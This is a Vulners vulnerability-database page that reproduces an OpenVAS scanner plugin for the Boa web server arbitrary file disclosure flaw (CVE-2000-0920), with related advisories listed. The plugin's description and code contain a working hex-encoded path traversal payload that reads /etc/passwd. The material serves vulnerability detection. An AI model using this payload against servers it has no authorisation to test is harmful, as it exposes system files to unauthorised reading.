Lucene search
+L

Boa Web Server File Disclosure Vulnerability (Oct 2000) - Active Check

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2000 Thomas ReinkeType 
openvas
 openvas
🔗 plugins.openvas.org👁 46 Views

Boa server allows remote attacker to read arbitrary file

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
BOA Web Server 0.94.8.2 - Arbitrary File Access Vulnerability
9 Apr 201500:00
zdt
nessus
Tenable Nessus
EAServer <= 6.3.1 Multiple Vulnerabilities
3 Jul 201300:00
nessus
nessus
Tenable Nessus
Boa Web Server Traversal Arbtirary File Access/Execution
6 Oct 200000:00
nessus
cve
CVE
CVE-2000-0920
22 Jan 200105:00
cve
cvelist
Cvelist
CVE-2000-0920
22 Jan 200105:00
cvelist
exploitdb
Exploit DB
BOA Web Server 0.94.8.2 - Arbitrary File Access
19 Dec 200000:00
exploitdb
euvd
EUVD
EUVD-2000-0907
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-0920
19 Dec 200005:00
nvd
openvas
OpenVAS
Boa file retrieval
3 Nov 200500:00
openvas
securityvulns
securityvulns
Boa &#40;with Intersil Extensions&#41; - HTTP Basic Authentication Bypass
17 Sep 200700:00
securityvulns
# SPDX-FileCopyrightText: 2000 Thomas Reinke
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10527");
  script_version("2025-09-12T05:38:45+0000");
  script_tag(name:"last_modification", value:"2025-09-12 05:38:45 +0000 (Fri, 12 Sep 2025)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2000-0920");
  script_name("Boa Web Server File Disclosure Vulnerability (Oct 2000) - Active Check");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2000 Thomas Reinke");
  script_family("Remote file access");
  script_dependencies("gb_get_http_banner.nasl", "os_detection.nasl");
  script_mandatory_keys("Boa/banner");

  script_tag(name:"summary", value:"The Boa Web Server is prone to a file disclosure
  vulnerability.");

  script_tag(name:"insight", value:"The remote Boa server allows an attacker to read arbitrary files
  on the remote web server, prefixing the pathname of the file with hex-encoded ../../..

  Example:

  GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd

  will return /etc/passwd.");

  script_tag(name:"solution", value:"Update to a latest version of the server.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"https://web.archive.org/web/20210121153517/http://www.securityfocus.com/bid/1770");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("port_service_func.inc");
include("traversal_func.inc");

port = http_get_port(default:80);
files = traversal_files();

foreach pattern(keys(files)) {

  file = files[pattern];

  url = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/" + file);
  req = http_get(item:url, port:port);
  res = http_send_recv(port:port, data:req);

  if(egrep(string:res, pattern:pattern, icase:TRUE)) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(port:port, data:report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.08358
46